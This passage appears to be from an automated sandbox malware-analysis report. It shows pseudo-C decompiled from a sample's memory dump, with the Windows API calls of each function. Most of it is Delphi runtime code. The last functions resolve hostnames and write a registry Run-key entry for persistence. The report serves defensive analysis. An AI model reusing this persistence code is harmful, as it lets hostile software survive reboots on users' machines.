      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
    				char _v260;
    				char _v768;
    				char _v772;
    				short* _v776;
    				intOrPtr _v780;
    				char _v784;
    				signed int _v788;
    				signed short* _v792;
    				char _v796;
    				char _v800;
    				intOrPtr* _v804;
    				void* __ebp;
    				signed char _t47;
    				signed int _t54;
    				void* _t62;
    				intOrPtr* _t73;
    				intOrPtr* _t91;
    				void* _t93;
    				void* _t95;
    				void* _t98;
    				void* _t99;
    				intOrPtr* _t108;
    				void* _t112;
    				intOrPtr _t113;
    				char* _t114;
    				void* _t115;
    
    				_t100 = __ecx;
    				_v780 = __ecx;
    				_t91 = __edx;
    				_v776 = __eax;
    				if(( *(__edx + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t47 =  *_t91;
    				if((_t47 & 0x00000fff) != 0xc) {
    					_push(_t91);
    					_push(_v776);
    					L0040C5A0();
    					return E0040D7EC(_v776);
    				} else {
    					if((_t47 & 0x00000040) == 0) {
    						_v792 =  *((intOrPtr*)(_t91 + 8));
    					} else {
    						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
    					}
    					_v788 =  *_v792 & 0x0000ffff;
    					_t93 = _v788 - 1;
    					if(_t93 < 0) {
    						L9:
    						_push( &_v772);
    						_t54 = _v788;
    						_push(_t54);
    						_push(0xc);
    						L0040C9F4();
    						_t113 = _t54;
    						if(_t113 == 0) {
    							E0040D544(_t100);
    						}
    						E0040DB18(_v776);
    						 *_v776 = 0x200c;
    						 *((intOrPtr*)(_v776 + 8)) = _t113;
    						_t95 = _v788 - 1;
    						if(_t95 < 0) {
    							L14:
    							_t97 = _v788 - 1;
    							if(E0040DB34(_v788 - 1, _t115) != 0) {
    								L0040CA0C();
    								E0040D7EC(_v792);
    								L0040CA0C();
    								E0040D7EC( &_v260);
    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
    							}
    							_t62 = E0040DB64(_t97, _t115);
    						} else {
    							_t98 = _t95 + 1;
    							_t73 =  &_v768;
    							_t108 =  &_v260;
    							do {
    								 *_t108 =  *_t73;
    								_t108 = _t108 + 4;
    								_t73 = _t73 + 8;
    								_t98 = _t98 - 1;
    							} while (_t98 != 0);
    							do {
    								goto L14;
    							} while (_t62 != 0);
    							return _t62;
    						}
    					} else {
    						_t99 = _t93 + 1;
    						_t112 = 0;
    						_t114 =  &_v772;
    						do {
    							_v804 = _t114;
    							_push(_v804 + 4);
    							_t18 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040C9FC();
    							E0040D7EC(_v792);
    							_push( &_v784);
    							_t21 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040CA04();
    							E0040D7EC(_v792);
    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
    							_t112 = _t112 + 1;
    							_t114 = _t114 + 8;
    							_t99 = _t99 - 1;
    						} while (_t99 != 0);
    						goto L9;
    					}
    				}
    			}






























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
    				long _v4;
    				int _t3;
    
    				if( *0x454044 == 0) {
    					if( *0x419030 == 0) {
    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
    					}
    					return _t3;
    				} else {
    					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
    						 *0x454230();
    					}
    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
    					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
    				}
    			}






    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B9A0() {
    				struct HINSTANCE__** _t2;
    				void* _t3;
    				struct HINSTANCE__** _t5;
    				struct HRSRC__* _t7;
    				struct HINSTANCE__** _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t12;
    				struct HINSTANCE__* _t13;
    
    				_t2 =  *0x452f9c; // 0x45402c
    				if( *_t2 != 0) {
    					_t5 =  *0x452f9c; // 0x45402c
    					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
    					_t8 =  *0x452f9c; // 0x45402c
    					return LoadResource( *_t8, _t7);
    				}
    				_t3 = 0;
    				_t11 =  *0x4530b8; // 0x419034
    				_t12 =  *_t11;
    				if(_t12 != 0) {
    					while(1) {
    						_t13 =  *(_t12 + 4);
    						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
    						if(_t3 != 0) {
    							goto L5;
    						}
    						_t12 =  *_t12;
    						if(_t12 != 0) {
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t3;
    			}












    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
    				long _t11;
    				void* _t16;
    
    				_t16 = __ebx;
    				 *__edi =  *__edi + __ecx;
    				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
    				 *0x419008 = 2;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454046 = 2;
    				 *0x454000 = E00404B04;
    				if(E00402F5C() != 0) {
    					_t3 = E00402F8C();
    				}
    				E00403050(_t3);
    				 *0x45404c = 0xd7b0;
    				 *0x454218 = 0xd7b0;
    				 *0x4543e4 = 0xd7b0;
    				 *0x45403c = GetCommandLineA();
    				 *0x454038 = E004012C0();
    				if((GetVersion() & 0x80000000) == 0x80000000) {
    					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    				} else {
    					if((GetVersion() & 0x000000ff) <= 4) {
    						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    					} else {
    						 *0x4545b8 = 3;
    					}
    				}
    				_t11 = GetCurrentThreadId();
    				 *0x454030 = _t11;
    				return _t11;
    			}






    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				char _v297;
    				char _v304;
    				intOrPtr _v308;
    				char _v312;
    				char _v316;
    				char _v320;
    				intOrPtr _v324;
    				char _v328;
    				void* _v332;
    				char _v336;
    				char _v340;
    				char _v344;
    				char _v348;
    				intOrPtr _v352;
    				char _v356;
    				char _v360;
    				char _v364;
    				void* _v368;
    				char _v372;
    				intOrPtr _t52;
    				intOrPtr _t60;
    				intOrPtr _t82;
    				intOrPtr _t86;
    				intOrPtr _t89;
    				intOrPtr _t101;
    				void* _t108;
    				intOrPtr _t110;
    				void* _t113;
    
    				_t108 = __edi;
    				_v372 = 0;
    				_v336 = 0;
    				_v344 = 0;
    				_v340 = 0;
    				_v8 = 0;
    				_push(_t113);
    				_push(0x40ab3b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t113 + 0xfffffe90;
    				_t89 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
    					_t52 =  *0x453064; // 0x405f58
    					E00405824(_t52,  &_v8);
    				} else {
    					_t86 =  *0x453120; // 0x405f50
    					E00405824(_t86,  &_v8);
    				}
    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
    				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
    					_v368 =  *(_t89 + 0xc);
    					_v364 = 5;
    					_v360 = _v8;
    					_v356 = 0xb;
    					_v352 = _t110;
    					_v348 = 5;
    					_t60 =  *0x453068; // 0x405f00
    					E00405824(_t60,  &_v372);
    					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
    				} else {
    					_v332 =  *(_t89 + 0xc);
    					_v328 = 5;
    					E004040F8( &_v340, 0x105,  &_v297);
    					E00407660(_v340,  &_v336);
    					_v324 = _v336;
    					_v320 = 0xb;
    					_v316 = _v8;
    					_v312 = 0xb;
    					_v308 = _t110;
    					_v304 = 5;
    					_t82 =  *0x4530a0; // 0x405ff8
    					E00405824(_t82,  &_v344);
    					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
    				}
    				_pop(_t101);
    				 *[fs:eax] = _t101;
    				_push(E0040AB42);
    				E00403E88( &_v372);
    				E00403EAC( &_v344, 3);
    				return E00403E88( &_v8);
    			}

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t73;
    				intOrPtr _t74;
    				intOrPtr _t83;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				void* _t93;
    
    				_t93 = __fp0;
    				_v8 = __ecx;
    				_t73 = __edx;
    				_t87 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t73);
    				} else {
    					_v12 = _t73 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t74 = 0x40a49c;
    				_t86 = 0x40a49c;
    				_t83 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t87, _t83) != 0) {
    					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
    					_t69 = E00407764(_t74, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
    						_t86 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t87,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t74;
    				_v832 = 6;
    				_v828 = _t86;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
    				return E00407764(_v8, _t86);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t74;
    				intOrPtr _t75;
    				intOrPtr _t85;
    				intOrPtr _t89;
    				intOrPtr* _t92;
    				void* _t105;
    
    				_v8 = __ecx;
    				_t74 = __edx;
    				_t92 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t74);
    				} else {
    					_v12 = _t74 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t75 = 0x40a49c;
    				_t89 = 0x40a49c;
    				_t85 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t92, _t85) != 0) {
    					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
    					_t69 = E00407764(_t75, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
    						_t89 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t92,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t75;
    				_v832 = 6;
    				_v828 = _t89;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
    				return E00407764(_v8, _t89);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 65%
    			E00402F8C() {
    				void* _v8;
    				char _v12;
    				int _v16;
    				signed short _t12;
    				signed short _t14;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t31;
    				intOrPtr _t32;
    
    				_t29 = _t31;
    				_t32 = _t31 + 0xfffffff4;
    				_v12 =  *0x419020 & 0x0000ffff;
    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
    					_t12 =  *0x419020; // 0x1332
    					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
    					 *0x419020 = _t14;
    					return _t14;
    				} else {
    					_push(_t29);
    					_push(E00402FFD);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t32;
    					_v16 = 4;
    					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(0x403004);
    					return RegCloseKey(_v8);
    				}
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
    				char _v8;
    				intOrPtr* _t18;
    				intOrPtr _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr _t32;
    				void* _t33;
    
    				_t33 = __eflags;
    				_push(0);
    				_push(_t32);
    				_push(0x40a0cf);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32;
    				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
    				_t29 = E00407174(0x40a0e4, 1, _t33);
    				if(_t29 + 0xfffffffd - 3 < 0) {
    					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
    					_t27 = 7;
    					_t18 = 0x454764;
    					do {
    						 *_t18 = 0xffffffff;
    						_t18 = _t18 + 4;
    						_t27 = _t27 - 1;
    					} while (_t27 != 0);
    					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
    				}
    				_pop(_t26);
    				 *[fs:eax] = _t26;
    				_push(E0040A0D6);
    				return E00403E88( &_v8);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				void* _t41;
    				signed int _t45;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				signed int _t83;
    				signed int _t92;
    				intOrPtr _t111;
    				void* _t122;
    				void* _t124;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t128 = __eflags;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_t122 = __edx;
    				_t124 = __eax;
    				_push(_t127);
    				_push(0x40a2b2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t127;
    				_t92 = 1;
    				E00403E88(__edx);
    				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
    				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
    					while(1) {
    						_t41 = E00404148(_t124);
    						__eflags = _t92 - _t41;
    						if(_t92 > _t41) {
    							goto L28;
    						}
    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
    						asm("bt [0x419108], eax");
    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
    							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
    								__eflags = _t47;
    								if(_t47 != 0) {
    									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
    									__eflags = _t49;
    									if(_t49 != 0) {
    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
    										__eflags = _t51;
    										if(_t51 == 0) {
    											L24:
    											E00404150(_t122, 0x40a30c);
    										} else {
    											__eflags = _t51 != 0x20;
    											if(_t51 != 0x20) {
    												E00404070();
    												E00404150(_t122, _v24);
    											} else {
    												goto L24;
    											}
    										}
    									} else {
    										E00404150(_t122, 0x40a300);
    										_t92 = _t92 + 1;
    									}
    								} else {
    									E00404150(_t122, 0x40a2ec);
    									_t92 = _t92 + 3;
    								}
    							} else {
    								E00404150(_t122, 0x40a2d8);
    								_t92 = _t92 + 1;
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						} else {
    							_v8 = E0040B04C(_t124, _t92);
    							E004043A8(_t124, _v8, _t92,  &_v20);
    							E00404150(_t122, _v20);
    							_t92 = _t92 + _v8;
    						}
    					}
    				} else {
    					_t75 =  *0x45473c; // 0x9
    					_t76 = _t75 - 4;
    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
    						_t77 = 1;
    					} else {
    						_t77 = 0;
    					}
    					if(_t77 == 0) {
    						E00403EDC(_t122, _t124);
    					} else {
    						while(_t92 <= E00404148(_t124)) {
    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags = _t83 != 0x20;
    								if(_t83 != 0x20) {
    									E00404070();
    									E00404150(_t122, _v16);
    								}
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						}
    					}
    				}
    				L28:
    				_pop(_t111);
    				 *[fs:eax] = _t111;
    				_push(E0040A2B9);
    				return E00403EAC( &_v24, 4);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
    				char _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v48;
    				void* _t22;
    				void* _t35;
    				intOrPtr* _t38;
    				void* _t47;
    
    				_t47 = __ecx;
    				_t38 = __edx;
    				E00403E88(__ecx);
    				if(_t38 == 0) {
    					return E00403EDC(_t47, "0.0.0.0");
    				}
    				if( *_t38 + 0xd0 - 0xa >= 0) {
    					_t22 = E00404348(_t38);
    					_push(_t22);
    					L0040C4F8();
    					if(_t22 != 0) {
    						_v48 = 0;
    						_v44 = 0;
    						_v40 = 0;
    						_v36 = 0;
    						_v32 = 0;
    						_v28 = 0;
    						_v24 = 0;
    						_v20 = 0;
    						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
    					}
    				} else {
    					_t35 = E00404348(_t38);
    					_push(_t35);
    					L0040C4C8();
    					_t22 = _t35 + 1;
    					if(_t22 != 0) {
    						return E00403EDC(_t47, _t38);
    					}
    				}
    				return _t22;
    			}

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				int _t28;
    				char* _t41;
    				intOrPtr _t47;
    				void* _t51;
    
    				_v20 = 0;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t51);
    				_push(0x418692);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t51 + 0xfffffff0;
    				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
    				_t41 = E00404348(_v12);
    				E00404080( &_v20, _t41);
    				_t28 = E00404148(_v20);
    				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
    				RegCloseKey(_v16);
    				_pop(_t47);
    				 *[fs:eax] = _t47;
    				_push(E00418699);
    				E00403E88( &_v20);
    				return E00403EAC( &_v12, 2);
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
